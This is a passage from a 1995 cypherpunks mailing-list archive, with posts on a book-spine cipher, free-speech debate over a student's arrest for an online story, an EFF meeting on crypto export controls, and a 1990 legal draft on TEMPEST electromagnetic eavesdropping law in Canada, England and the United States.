much about crypto except for the spine.

I made a text file of the 1260 bits on the spine.

a sample perl script is included to grab the bits.

Next month's issue of Wired is supposed to have
a discussion about the spine and the encrypted messages.

the only hint I've got is:
   000 000 111

I know how you guys love this stuff, he says it
(the code) is unbreakable...

-Rick






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jtender@telerama.lm.com (John Tender)
Date: Sat, 11 Feb 95 11:12:23 PST
Subject: Re:       Re: Laws, Feds, & the Internet
Message-ID: <3hj262$32m@africa.lm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Richard F. Dutcher" <rfdutcher@igc.apc.org> writes:

> They *do* have to prove intent -- as to how, that's what juries are 
> for.  BTW, he used her real name in the post, with no disclaimers 
> about fiction.  From what I have heard, if he had said the same thing 
> in her presence, he could have been arrested for assault.
> 
> So is saying something that would be actionable in a public space
> also actionable in a public cyberspace?  I dunno, and neither does
> anyone else.  But it's a well-established principle that a threat is 
> a shout of "Fire!" in a crowded theater.

How do you know what was in the original post?
Can you post a copy here?


-- 
JT                            "From the purlieus of Pittsburgh"      
jtender@telerama.lm.com      
"Everything must GO"
   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jtender@telerama.lm.com (John Tender)
Date: Sat, 11 Feb 95 11:12:33 PST
Subject: Re:       Re: Laws, Feds, & the Internet
Message-ID: <3hj26d$32o@africa.lm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Richard F. Dutcher" <rfdutcher@igc.apc.org> writes:

> They *do* have to prove intent -- as to how, that's what juries are 
> for.  BTW, he used her real name in the post, with no disclaimers 
> about fiction.  From what I have heard, if he had said the same thing 
> in her presence, he could have been arrested for assault.

How do you know the content of the original post?
Can you post it here?




-- 
JT                            "From the purlieus of Pittsburgh"      
jtender@telerama.lm.com      
"Everything must GO"
   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andre Bacard <abacard@well.sf.ca.us>
Date: Sat, 11 Feb 95 15:43:45 PST
To: cypherpunks@toad.com
Subject: Feb 15th Meeting About PGP
Message-ID: <199502112343.PAA13759@well.sf.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
 
The Electronic Frontier Foundation <info@eff.org> will meet on
Wednesday, February 15th at the WIRED magazine <info@wired.com>
office in San Francisco. John Gilmore and Cindy Cohn will discuss
the constitutional implications of export controls on cryptography.
This topic relates directly to PGP.
 
Attached you'll discover complete details about this meeting --
which I've borrowed from the EFFector, EFF's online newsletter. I
hope to see you Wednesday!
 
***************************************************************
Andre Bacard,              Bacard wrote "The Computer Privacy
Stanford, California       Handbook: A Practical Guide to E-Mail
abacard@well.com           Encryption, Data Protection, and PGP
                           Privacy Software" [for novices/experts].
 
Introduction by Mitchell Kapor, co-Founder of Electronic Frontier
Foundation and creator of Lotus 1-2-3.
 
          +++ Book forthcoming. Write for details. +++
*****************************************************************
 
 
Subject: EFF SF Bay Area Meetings Announced
- -------------------------------------------
 
EFF is pleased to introduce a series of monthly `BayFF' meetings in
the San Francisco Bay Area.  All EFF members, guests, and the
public are invited.
 
The first meeting will be in San Francisco on February 15, 1995, at
7:30PM.  The gracious donor of our first meeting place is:
 
        Wired Magazine
        520 Third Street, Fourth Floor
        San Francisco, CA
        +1 415 222 6200  voice
 
John Gilmore and Cindy Cohn will speak on the constitutional issues
around export controls on cryptography.  John is a co-founder of
EFF and Chair of the EFF Board's Crypto Committee.  Cindy is an
attorney in private practice at McGlashen and Sarrail in San Mateo. 
These controls inhibit free speech, publication of software and
papers, academic freedom of inquiry, and personal privacy, as well
as having a strong negative impact on computer security.  We'll
explore some of the implications and prospects for change.
 
Dave Farber will speak on "Living in the Global Information
Infrastructure -- some concerns".  Dave is an EFF Board member and
has more years of experience in computers and networking than the
total experience at many startup companies.  Vice President Gore
has proposed that the nations of the world undertake the building
of a Global Information Infrastructure -- the GII.  While most
leaders agree with the sprit of the Gore proposal -- namely to
provide a mechanism which could invigorate the world economy in the
forthcoming information age, many disagree with his belief that it
will bring democracy to the world.  They interpret such statements
as being another example of American colonialism.  It is this basic
lack of uniform global agreement on what terms mean, what rules
apply to electronic commerce and what impact a GII will have on
their nation that underlies the comments Dave will make.  These
raise questions about the universality of Cyberspace.  He will seek
to table a set of questions that may  stimulate your thinking in
this area.
 
There will also be plenty of time for general and specific
questions, issues, discussion, meeting people, and socializing with
frontier- minded folks.
 
 
-----BEGIN PGP SIGNATURE-----
Version: 2.7
 
iQCVAwUBLz04Y96pT6nCx/9/AQF4CQP9EsOJdzn75G+5mG73nX/URpina5K58rIW
marI385hS/66wqMDNlsRZ3d8VxCAFp7SPgO7XiajMMrNDTPEpAQjvqU233R2k3aP
Yk19xNnIKisL8rBTmNw0r8eoH8dI+4/XqnDP3GOmf2nTq9Y/P9hVwtVqH9vpCaVD
CjloHxczOwY=
=4imy
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@nately.UCSD.EDU (Anonymous)
Date: Sat, 11 Feb 95 16:37:02 PST
To: cypherpunks@toad.com
Subject: TEMPEST Paper by Former Civilian (2/2)
Message-ID: <9502120040.AA14089@nately.UCSD.EDU>
MIME-Version: 1.0
Content-Type: text/plain



                                IV. CANADIAN LAW
               Canada has taken direct steps to limit eavesdropping on
          computers.    The Canadian  Criminal  Amendment Act  of 1985

          _____________________              

          22.  Interception of Communications Act 1985, § 1, Prohibition on
          Interception:
               (1) Subject to the  following provisions of this section,  a
               person who  intentionally intercepts a communication  in the
               course of its  transmission by post or by  means of a public
               telecommunications system shall be guilty  of an offence and
               liable--
                    (a) on summary  conviction, to a fine not exceeding the
                    statutory maximum;
                    (b) on conviction on indictment,  to imprisonment for a
                    term not exceeding two years or to a fine or to both.
               ***

          23.  Tapping  (aka  trespassatory eavesdropping)  is  patently in
          violation  of the statute.  "The  offense created by section 1 of
          the Interception of Communications Act 1985 covers those forms of
          eavesdropping on computer communications  which involve "tapping"
          the wires along  which messages  are being passed.   One  problem
          which  may  arise,  however,  is  the  question  of  whether  the
          communication in question  was intercepted in  the course of  its
          transmission by  means of a public telecommunications system.  It
          is technically possible  to intercept a communication  at several
          stages in its transmission,  and it may be a question  of fact to
          decide the stage  at which it enters the "public" realm."  THE LAW
          COMMISSION, WORKING PAPER NO. 110: COMPUTER MISUSE,  3.30 (1988). 

          24.  "There are  also forms of  eavesdropping which the  Act does
          not cover.  For  example, eavesdropping on a V.D.U.  [referred to
          in  this text as a CRT] screen  by monitoring the radiation field
          which surrounds it  in order to  display whatever appears on  the
          legitimate  user's  screen on  the  eavesdropper's screen.   This
          activity would not  seem to  constitute any criminal  offence..."
          THE LAW COMMISSION, WORKING PAPER NO. 110: COMPUTER MISUSE,  3.31
          (1988).

<New Page>
          criminalized indirect access  to a computer service.[25]   The
          specific reference  to an  "electromagnetic device"  clearly
          shows the intent  of the legislature  to include the use  of
          TEMPEST ELINT equipment within the ambit of the legislation.
               The limitation of obtaining "any computer service" does
          lead to  some confusion.   The Canadian legislature  has not
          made  it  clear  whether  "computer  service"  refers  to  a
          computer  service  bureau  or  merely   the  services  of  a
          computer.    If  the  Canadians  had  meant  access  to  any
          computer,  why  did they  refer  to any  "computer service"?
          This  is  especially  confusing  considering  the  all-encompassing
          language  of (b)  'any function  of a  computer system'.
               Even   if   the   Canadian   legislation   criminalizes
          eavesdropping  on  all  computers,  it  does not  solve  the
          problem  of  protecting  the privacy  of  information.   The
          purpose  of  criminal law  is  to control  crime.[26]   Merely
          making  TEMPEST  ELINT  illegal will  not  control  its use.
          First, because  it  is an  inherently  passive crime  it  is
          impossible to detect and hence punish.  Second, making  this
          form of  eavesdropping  illegal without  taking a  proactive
          stance  in  controlling  compromising emanations  gives  the
          public a false sense of security.   Third, criminalizing the
          possession of a TEMPEST ELINT  device prevents public sector
          research into countermeasures.   Finally,  the law will  not
          prevent eavesdropping on private information held in company
          computers unless  disincentives are given for companies that
          do not take sufficient precautions against eavesdropping and
          simple, more common, information crimes.[27]
          _____________________              

          25.   301.2(1) of the  Canadian criminal code states  that anyone
          who:

          ... without color of right,
          (a) obtains, directly or indirectly, any computer service,
          (b)  by  means  of  an  electromagnetic  ...   or  other  device,
          intercepts  or  causes  to  be  intercepted, either  directly  or
          indirectly, any function of  a computer system ... [is  guilty of
          an indictable offence].

          26.  UNITED   STATES   SENTENCING   COMM'N,  FEDERAL   SENTENCING
          GUIDELINES MANUAL (1988) (Principles  Governing the Redrafting of
          the Preliminary Guidelines "g." (at an unknown page)) 

          27.  There has been great debate over  what exactly is a computer
          crime.    There  are  several  schools  of  thought.    The  more
          articulate school, and the one to  which the author adheres holds
          that  the category  computer crime  should be  limited to  crimes
          directed against computers; for example, a terrorist destroying a
          computer  with explosives would fall into  this category.  Crimes
          such as  putting  ghost  employees  on  a  payroll  computer  and

<New Page>

                                  V. SOLUTIONS
               TEMPEST ELINT  is passive.   The  computer or  terminal
          emanates  compromising radiation which is intercepted by the
          TEMPEST device  and reconstructed  into useful  information.
          Unlike conventional  ELINT there  is no  need to  physically
          trespass or even come near the target.  Eavesdropping can be
          performed from a nearby office or even a van parked within a
          reasonable distance.   This means  that there is  no classic
          scene of the crime; and little or  no chance of the criminal
          being discovered in the act.[28]  
               If the crime is discovered it will be ancillary to some
          other  investigation.    For example,  if  an  individual is
          investigated for insider  trading a search of  his residence
          may yield a TEMPEST ELINT device.   The device would explain
          how the defendant was obtaining  insider information; but it
          was the insider trading, not the  device, that gave away the
          crime.
               This  is  especially  true  for illegal  TEMPEST  ELINT
          performed by the state.  Unless the perpetrators are  caught
          in the act  there is  little evidence  of their  spying.   A
          trespassatory bug can be detected and located; further, once
          found it provides tangible evidence that a crime took place.
          A TEMPEST ELINT device by its inherent passive nature leaves
          nothing to detect.   Since the government is less  likely to
          commit an ancillary crime which might be detected there is a
          very small chance  that the spying will  ever be discovered.
          The  only way to  prevent eavesdropping is  to encourage the
          use of  countermeasures: TEMPEST  Certified[29] computers  and
          _____________________              
                                                                           
          collecting their pay are merely  age-old accounting frauds; today
          the  fraud involves a computer because  the records are kept on a
          computer.  The  computer is merely ancillary to  the crime.  This
          has been mislabeled  computer crime and should merely be referred
          to as a fraud perpetrated with  the aid of a computer.   Finally,
          there are information  crimes.  These  are crimes related to  the
          purloining or  alteration of information.  These  crimes are more
          common and more profitable due to  the computer's ability to hold
          and access great amounts of information.   TEMPEST ELINT can best
          be categorized as an information crime.

          28.  Compare, for  example, the  Watergate break-in  in which  the
          burglars  were discovered  when they  returned to  move  a poorly
          placed spread spectrum bug.

          29.  TEMPEST Certified refers  to the  equipment having passed  a
          testing and  emanations regime specified  in NACSIM 5100A.   This
          classified document sets forth the emanations levels that the NSA
          believes digital equipment can give  off without compromising the
          information it  is processing.   TEMPEST  Certified equipment  is
          theoretically secure against TEMPEST eavesdropping.  

<New Page>
          terminals.
               In merely making  TEMPEST ELINT  illegal the public  is
          given the  false impression  of security;  they are lulled  into
          believing  the  problem  has been  solved.    Making certain
          actions illegal does not prevent them  from occurring.  This
          is  especially  true  for  TEMPEST  ELINT  because it  is
          undetectable.  Punishment is an empty  threat if there is no
          chance of being  detected; without detection there can be no
          apprehension and conviction.   The only way  to prevent some
          entity  from eavesdropping  on  one's  computer or  computer
          terminal is  for the equipment not to  give off compromising
          emanation; it must be TEMPEST Certified.
               The United  States can solve  this problem by  taking a
          proactive  stance on compromising  emanations.  The National
          Institute of Standards and Technology  (NIST[30]) is in charge
          of  setting  forth standards  of  computer security  for the
          private  sector.   NIST  is  also charged  with  doing basic
          research to advance the art of computer security.  Currently
          NIST does not discuss TEMPEST with  the private sector.  For
          privacy's sake,  this policy must be changed  to a proactive
          one.  The NIST should publicize  the TEMPEST ELINT threat to
          computer  security and  should set  up a  rating system  for
          level  of  emanations  produced   by  computer  equipment.[31]
          Further,  legislation  should  be  enacted  to  require  the
          labeling  of  all computer  equipment    with  its level  of
          emanations and whether it is TEMPEST Certified.  Only if the
          public  knows of the  problem can it begin  to take steps to
          solve it.
               Title III makes  possession of a surveillance  device a
          crime,  unless  it   is  produced  under  contract   to  the
          government.  This means that  research into surveillance and
          counter-surveillance   equipment   is  monopolized   by  the
          government and a  few companies working under  contract with
          _____________________              
                                                                           
               NACSIM 5100A is  classified, as are all  details of TEMPEST.
          To  obtain access to  it, a contractor  must prove that  there is
          demand within  the government for the specific  type of equipment
          that it intends to certify.  Since the standard is classified, the
          contractors can not sell the equipment to non-secure governmental
          agencies or the public.  This prevents reverse engineering of the
          standard  for its physical  embodiment, the  Certified equipment.
          By  preventing  the   private  sector  from  owning   this  anti-
          eavesdropping equipment,  the NSA  has effectively prevented
          them from protecting the information in their computers. 

          30.  Previously the Bureau of Standards.   The NIST is a division
          of the Commerce Department.

          31.  In this case computer equipment would include all peripheral
          computer equipment.  There is no use in using a TEMPEST Certified
          computer if the printer or the modem are not Certified.

<New Page>
          the government.   If TEMPEST eavesdropping  is criminalized,
          then possession of TEMPEST ELINT equipment will be criminal.
          Unfortunately, this  does  not solve the  problem.    Simple
          TEMPEST ELINT  equipment is easy  to make.   For just  a few
          dollars  many  older  television  sets  can be  modified  to
          receive and  reconstruct  EMR.    For less  than  a  hundred
          dollars a more  sophisticated TEMPEST ELINT receiver  can be
          produced[32].  
               The  problem  with  criminalizing  the  possession   of
          TEMPEST ELINT equipment is  not just that the law  will have
          little effect on the use of such equipment, but that it will
          have a  negative effect  on counter-measures  research.   To
          successfully   design   counter-measures  to   a  particular
          surveillance  technique  it  is  vital  to have  a  complete
          empirical  understanding   of  how  that   technique  works.
          Without  the right  to  legally manufacture  a  surveillance
          device there is no possible way for a researcher to have the
          knowledge to  produce an effective  counter-measures device.
          It  is  axiomatic:  without  a  surveillance device,  it  is
          impossible to test a counter-measures device.  
               A number of  companies produce  devices to measure  the
          emanations from electrical equipment.  Some of these devices
          are  specifically   designed  for   bench  marking   TEMPEST
          Certified equipment.  This does not  solve the problem.  The
          question  arises:  how   much  radiation  at   a  particular
          frequency  is compromising?  The  current answer is to refer
          _____________________              

          32.  The  NSA  has tried  to  limit the  availability  of TEMPEST
          information to prevent the spread of the devices.
               For a discussion of the  First Amendment and prior restraint
          See, e.g. The United  States of America v. Progressive,  Inc. 467
          F.Supp 990 (1979, WD Wis.)(magazine intended to publish plans for
          nuclear  weapon; prior  restraint injunction  issued),  reh. den.
          United States v. Progressive  Inc. 486 F.Supp 5 (1979,  WD Wis.),
          motion  den  Morland  v. Sprecher  443  US  709 (1979)(mandamus),
          motion denied  United States  v. Progressive,  Inc. 5  Media L  R
          (1979, 7th Cir.), dismd. without op. U.S. v. Progressive, Inc 610
          F.2d 819 (1979, 7th Cir.); New York Times, Co. v.  United States,
          403  U.S.  713 (1971)(per  curiam)(Pentagon Papers  case: setting
          forth prior  restraint standard  which government  was unable  to
          meet); T.  EMERSON, THE SYSTEM  OF FREEDOM OF  EXPRESSION (1970);
          Balance  Between Scientific  Freedom  and  National Security,  23
          JURIMETRICS  J. 1  (1982)(current  laws and  regulations limiting
          scientific and  technical expression exceed the  legitimate needs
          of national security); Hon. M.  Feldman, Why the First  Amendment
          is not Incompatible  with National Security, HERITAGE  FOUNDATION
          REPORTS (Jan.  14, 1987).  Compare Bork,  Neutral Principles  and
          Some First Amendment Problems,  47 IND. L. J. 1  (First Amendment
          applies only to  political speech); G.  Lewy, Can Democracy  Keep
          Secrets, 26  POLICY REVIEW 17  (1983)(endorsing draconian secrecy
          laws mirroring the English system).

<New Page>
          to NACSIM  5100A.   This document  specifies the  emanations
          levels suitable  for Certification.   The  document is  only
          available  to United  States  contractors having  sufficient
          security  clearance  and  an  ongoing  contract  to  produce
          TEMPEST Certified computers  for the  government.   Further,
          the correct levels are specified by the NSA and there  is no
          assurance that, while these levels are sufficient to prevent
          eavesdropping by unfriendly operatives,  equipment certified
          under NACSIM  5100A will have  levels low enough  to prevent
          eavesdropping by the NSA itself.
               The  accessibility  of  supposedly  correct  emanations
          levels  does  not solve  the  problem of  preventing TEMPEST
          eavesdropping.     Access   to  NACSIM   5100A   limits  the
          manufacturer to selling the equipment  only to United States
          governmental  agencies  with  the  need  to  process  secret
          information.[33]  Without  the right to possess  TEMPEST ELINT
          equipment  manufacturers  who  wish to  sell  to  the public
          sector cannot determine what a  safe level of emanations is.
          Further  those  manufacturers with  access  to  NACSIM 5100A
          should  want  to  verify that  the  levels  set  out in  the
          document are, in  fact, low enough to  prevent interception.
          Without an actual  eavesdropping device with which  to test,
          no   manufacturer  will   be   able  to   produce  genuinely
          uncompromising equipment.

               Even if the  laws allow ownership of  TEMPEST Certified
          equipment by the public, and even  if the public is informed
          of  TEMPEST's   threat  to  privacy,   individuals'  private
          information will not necessarily  be protected.  Individuals
          may  choose to  protect their  own information on  their own
          computers.  Companies  may choose  whether to protect  their
          own  private  information.    But  companies that  hold  the
          private information of  individuals must  be forced to  take
          steps to protect that information.
               In  England  the  Data  Protection  Act 1984[34]  imposes
          sanctions   against   anyone   who   stores   the   personal
          information[35] on  a computer  and fails  to take  reasonable
          _____________________              

          33.  For  example, the  NSA has  just recently  allowed the  Drug
          Enforcement Agency (DEA) to  purchase TEMPEST Certified  computer
          equipment.    The DEA  wanted  secure computer  equipment because
          wealthy  drug   lords  were   using   TEMPEST  eavesdropping
          equipment.

          34.  An  Act  to  regulate  the  use of  automatically  processed
          information relating to individuals and the provision of services
          in respect of such information.
               -Data Protection Act 1984, Long Title.

          35.  "Personal data"  means data consisting  of information which
          relates to a  living individual who  can be identified from  that

<New Page>
          measures to prevent disclosure of that information.  The act
          mandates  that  personal  data  may  not  be  stored  in any
          computer  unless  the  computer bureau  or  data  user[36] has
          registered under the  act.[37]    This provides for a  central
          registry  and  the tracking  of  which companies  or persons
          maintain databases of personal information.   Data users and
          bureaux must  demonstrate a  need and  purpose behind  their
          possession of personal data.
               The act  provides tort  remedies to  any person  who is
          damaged by disclosure  of the  personal data.[38]   Reasonable
          care to  prevent the  disclosure  is a  defense.[39]   English
          _____________________              
                                                                           
          information (or from that and other information in the possession
          of the data user), including any  expression of opinion about the
          individual but not any  indication of the intentions of  the data
          user in respect of that individual.
               -Data Protection Act 1984 § 1(3)

          36.  "Data user" means  a person  who holds data,  and a  person
          "Holds" data if --
               (a) the data form part of a collection of  data processed or
               intended to be  processed by or on behalf  of that person as
               mentioned in  subsection (2) above; [subsection  (2) defines
               "data"] and
               (b) that person (either  alone or jointly or in  common with
               other persons)  controls the  contents and  use of  the data
               comprised in the collection; and
               (c) the data are in the form in which  they have been or are
               intended to be processed as mentioned in paragraph (a) above
               or (though not  for the time being  in that form) in  a form
               into which they have been converted after being so processed
               and  with  a  view  to  being  further  so  processed  on  a
               subsequent occasion.
               - Data Protection Act § 1(5).

          37.  Data Protection Act 1984, §§ 4, 5.

          38.  An individual who is the subject of personal data held  by a
          data user... and who  suffers damage by reason of  (1)(c) ... the
          disclosure of the  data, or  access having been  obtained to  the
          data without  such authority as  aforesaid shall  be entitled  to
          compensation from  the data  user... for any  distress which  the
          individual has  suffered  by  reason of  the  ...  disclosure  or
          access.
               - Data Protection Act 1984 § 23.

          39.  ... it shall  be a defense to  prove that ... the  data user
          ...  had  taken  such  care  as  in  all  the  circumstances  was
          reasonably required  to prevent  the... disclosure  or access  in
          question.
               - Data Protection Act 1984 § 23(3)

<New Page>
          courts  have not yet  ruled what level  of computer security
          measures  constitute  reasonable  care.     Considering  the
          magnitude of invasion possible with  TEMPEST ELINT it should
          be  clear  by now  that  failure  to use  TEMPEST  Certified
          equipment is prima facie unreasonable care.
               The Remedies section of the  act provides incentive for
          these entities to provide successful protection of personal
          data from disclosure  or illicit access.  Failure to protect
          the data will  result in monetary loss.  This  may be looked
          at from the economic efficiency  viewpoint as allocating the
          cost of disclosure  to the persons most  able to bear  those
          costs, and also most able to prevent disclosure.  Data users
          that  store   personal  data  would  use  TEMPEST  Certified
          equipment as part of their computer security plan, thwarting
          would-be eavesdroppers.  
               The Data Protection  Act 1984  allocates risk to  those
          who can  bear it best and provides  an incentive for them to
          keep other  individuals' data private.   This act  should be
          adopted by the United States as part of a full-spectrum plan
          to combat TEMPEST eavesdropping.  Data users are in the best
          position  to  prevent  disclosure  through  proper  computer
          security.    Only by  making  them  liable for  failures  in
          security can we begin to rein in TEMPEST ELINT.

                                       VII
                                 Recommendations
                 Do not  criminalize TEMPEST ELINT.   Most crimes that
          TEMPEST ELINT would aid, such as insider trading, are already
          illegal; the current laws are adequate.
                 The  National Institute of  Standards and  Technology
          should immediately begin  a program  to educate the  private
          sector about TEMPEST.  Only if  individuals are aware of the
          threat  can  they  take  appropriate precautions  or  decide
          whether any precautions are necessary.
                   Legislation  should  be   enacted  to  require  all
          electronic  equipment to  prominently display  its level  of
          emanations  and  whether  it  is   TEMPEST  Certified.    If
          individuals are to choose to protect themselves they must be
          able  to  make  an informed   decision  regarding  how  much
          protection is enough.
                 TEMPEST  Certified equipment  should be available  to
          the private  sector.   The current  ban on  selling to  non-
          governmental  agencies  prevents  individuals  who  need  to
          protect information from having the technology to do so.
                 Possession of  TEMPEST ELINT equipment should  not be
          made  illegal.   The  inherently  passive nature  and simple
          design  of  TEMPEST ELINT  equipment  means that  making its
          possession illegal  will not deter  crime; the units  can be
          easily manufactured and are impossible  to detect.  Limiting
          their   availability   serves   only   to   monopolize   the
          countermeasures research, information, and equipment for the
          government;   this   prevents   the  testing,   design   and

<New Page>
          manufacture of counter-measures by the private sector.
                 Legislation mirroring  England's Data Protection  Act
          1984 should be  enacted.  Preventing disclosure  of personal
          data  can  only be  accomplished  by giving  those companies
          holding the data a reason to protect  it.  If data users are
          held liable for  their failure  to take reasonable  security
          precautions they  will  begin to  take  reasonable  security
          precautions,  including   the  use   of  TEMPEST   Certified
          equipment.

-------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
Due to the double-blind, any mail replies to this message will be anonymized,
and an anonymous id will be allocated automatically. You have been warned.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Sat, 11 Feb 95 13:41:12 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: UMich student arrested for rape story
In-Reply-To: <199502110403.UAA12629@mail.igc.apc.org>
Message-ID: <199502112143.QAA12769@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Rich Dutcher writes:
> They *do* have to prove intent -- as to how, that's what juries are 
> for.  BTW, he used her real name in the post, with no disclaimers 
> about fiction.  From what I have heard, if he had said the same thing 
> in her presence, he could have been arrested for assault.

Based on the NY Times article I've read, you're omitting some important
extenuating circumstances here. For one thing, it was apparently posted to
alt.sex.stories, which seems to obviate the use of "fictional" disclaimers.
Furthermore, he did _not_ identify her as a UMich student.

I don't see the relevance of "if he had said the same thing in her presence".
He *didn't* !  There's an enormous difference between making a comment about
a person to third parties, and making the comment to that person.

According to the NY Times story, the woman mentioned in the story only heard
about it because reporters asked her about it !  I find a great deal of irony
in the report that the controversy started because an alt.sex.stories reader
in _Moscow_ tipped off the UMich authorities.

It appears that the Russians are allowed to read erotic fiction, while the
Americans are forbidden to read it, and get tossed in jail for writing it.
We've come a long way, baby. Yeah.

 -L. Futplex McCarthy; PGP key by finger or server   "The objective is for us 
  to get those conversations whether they're by an alligator clip or ones and 
  zeroes. Wherever they are, whatever they are, I need them." -FBI Dir. Freeh



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Sat, 11 Feb 95 13:47:32 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: NYT on Cybertheft and Sex Writer
In-Reply-To: <199502111435.JAA26507@pipe1.pipeline.com>
Message-ID: <199502112149.QAA12793@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


John Young writes:
> Peter Lewis writes on the U Mich student arrested for posting 
> fictional rough sex story.

Thanks once again for making this material available, John.

I must object to your thumbnail sketch of this story, though. The story as
described in the NY Times article does not involve "rough sex" -- it involves
rape, and the distinction is crucial.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@nately.UCSD.EDU (Anonymous)
Date: Sat, 11 Feb 95 16:57:12 PST
To: cypherpunks@toad.com
Subject: TEMPEST Paper by Former Civilian (1/2)
Message-ID: <9502120100.AA14610@nately.UCSD.EDU>
MIME-Version: 1.0
Content-Type: text/plain



For those interested in TEMPEST, below is a draft paper written 5 years ago
by Christopher Seline.  Mr Seline's new E-mail address ends with
"DOCKMASTER.NCSC.MIL",  so any attempts to query him about TEMPEST are
guaranteed to go unanswered.  I hope he still feels the same about TEMPEST
now that he has changed employers.  
 

Date: Fri, 19 Jan 90 19:13:44 -0500
From: cjs%cwru@cwjcc.ins.cwru.edu (Christopher J. Seline (CJS@CWRU.CWRU.EDU))

The following is a prepublication draft of an article on TEMPEST.  I am posting
it to this news group in the hope that it will:
        (1) stimulate discussion of this issue;
        (2) expose any technical errors in the document;
        (3) solicit new sources of information;
        (4) uncover anything I have forgotten to cover.

I will be unable to monitor the discussions of the article.  Therefore, PLEASE
post your comments to the news group BUT SEND ME A COPY AT THE ADDRESS LISTED
BELOW.

I have gotten a number of mail messages about the format of this
article.  Some explanation is in order:  The numbered paragraphs
following "____________________" on each page are footnotes.  I suggest
printing out the document rather than reading it on your CRT.

Thank you in advance.

Christopher Seline
cjs@cwru.cwru.edu
cjs@cwru.bitnet

(c) 1990 Christopher J. Seline
=============================================================================
<Start Print Job>
<New Page>
                                Eavesdropping On 
                         the Electromagnetic Emanations 
                              of Digital Equipment:
                               The Laws of Canada,
                          England and the United States

                           This  document is  a rough
                           draft.        The    Legal
                           Sections  are   overviews.
                           They     will     be
                           significantly expanded  in
                           the next version.

               We in this country, in this generation, are -- by
               destiny rather than choice -- the watchmen on the
               walls of world freedom.[1]
                                    -President John F. Kennedy

          _____________________              

          1.  Undelivered  speech  of  President  John  F.  Kennedy, Dallas
          Citizens Council (Nov. 22, 1963) 35-36.

<New Page>
                    In the novel 1984, George Orwell foretold a future
          where individuals had no expectation  of privacy because the
          state monopolized the technology of  spying.  The government
          watched the actions of its subjects from birth to death.  No
          one could protect himself because  surveillance and counter-
          surveillance technology was controlled by the government.
               This note explores  the legal status of  a surveillance
          technology  ruefully  known  as  TEMPEST[2].    Using  TEMPEST
          technology  the  information in  any  digital device  may be
          intercepted  and  reconstructed  into   useful  intelligence
          without the  operative ever having to come  near his target.
          The technology is  especially useful in the  interception of
          information  stored  in  digital computers  or  displayed on
          computer terminals.
               The use of TEMPEST is not illegal under the laws of the
          United  States[3],  or  England.    Canada has  specific  laws
          criminalizing TEMPEST eavesdropping but the  laws do more to
          hinder surveillance countermeasures than to prevent  TEMPEST
          surveillance.  In  the United  States it is  illegal for  an
          individual  to  take   effective  counter-measures   against
          TEMPEST surveillance.  This  leads to the conundrum that  it
          is legal  for individuals and  the government to  invade the
          privacy of others but illegal for  individuals to take steps
          to protect their privacy.
               The author would  like to suggest that the  solution to
          this   conundrum   is  straightforward.      Information  on
          _____________________              

          2.  TEMPEST  is an  acronym for  Transient Electromagnetic  Pulse
          Emanation Standard.   This standard sets forth the official views
          of the United  States on the amount  of electromagnetic radiation
          that a device may emit without compromising the information it is
          processing.   TEMPEST  is  a defensive  standard; a  device which
          conforms to this standard is referred to as TEMPEST Certified.
               The United States  government has refused to  declassify the
          acronym  for  devices  used   to  intercept  the  electromagnetic
          information of  non-TEMPEST Certified  devices.   For this  note,
          these  devices  and  the  technology  behind  them  will  also be
          referred  to as  TEMPEST;  in  which  case,  TEMPEST  stands  for
          Transient Electromagnetic Pulse Surveillance Technology.
               The  United  States  government refuses  to  release details
          regarding TEMPEST and continues an organized effort to censor the
          dissemination of  information  about it.    For example  the  NSA
          succeeded in shutting  down a  Wang Laboratories presentation  on
          TEMPEST Certified equipment  by classifying  the contents of  the
          speech and threatening  to prosecute  the speaker with  revealing
          classified information.  [cite coming].  

          3.  This  Note  will not  discuss   how  TEMPEST relates  to  the
          Warrant Requirement under  the United  States Constitution.   Nor
          will it discuss the Constitutional exclusion of foreign nationals
          from the Warrant Requirement. 

<New Page>
          protecting  privacy  under  TEMPEST should  be  made  freely
          available;  TEMPEST  Certified equipment  should  be legally
          available; and organizations possessing  private information
          should  be  required  by  law  to protect  that  information
          through  good  computer security  practices  and the  use of
          TEMPEST Certified equipment.

                            I. INTELLIGENCE GATHERING
               Spying is divided by professionals into two main types:
          human   intelligence   gathering  (HUMINT)   and  electronic
          intelligence gathering (ELINT).  As  the names imply, HUMINT
          relies   on   human   operatives,   and  ELINT   relies   on
          technological operatives.   In the past HUMINT  was the sole
          method  for collecting intelligence.[4]   The HUMINT operative
          would  steal  important  papers, observe  troop  and  weapon
          movements[5],  lure people  into  his confidences  to  extract
          secrets,  and   stand  under   the  eavesdrip[6]   of  houses,
          eavesdropping on the occupants.  
               As  technology  has progressed,  tasks that  once could
          only  be  performed  by  humans  have  been  taken  over  by
          machines.  So  it has  been with spying.   Modern  satellite
          technology allows troop and weapons movements to be observed
          with greater  precision and  from greater  distances than  a
          human  spy  could ever  hope to  accomplish.   The  theft of
          documents  and  eavesdropping on  conversations  may now  be
          performed electronically.  This means greater safety for the
          human operative, whose  only involvement may be  the placing
          of  the  initial  ELINT  devices.    This  has  led  to  the
          ascendancy of ELINT  over HUMINT  because the placement  and
          _____________________              

          4.  HUMINT  has  been  used  by  the   United  States  since  the
          Revolution.   "The necessity  of procuring  good intelligence  is
          apparent &  need not be further urged --  All that remains for me
          to add is, that you keep the  whole matter as secret as possible.
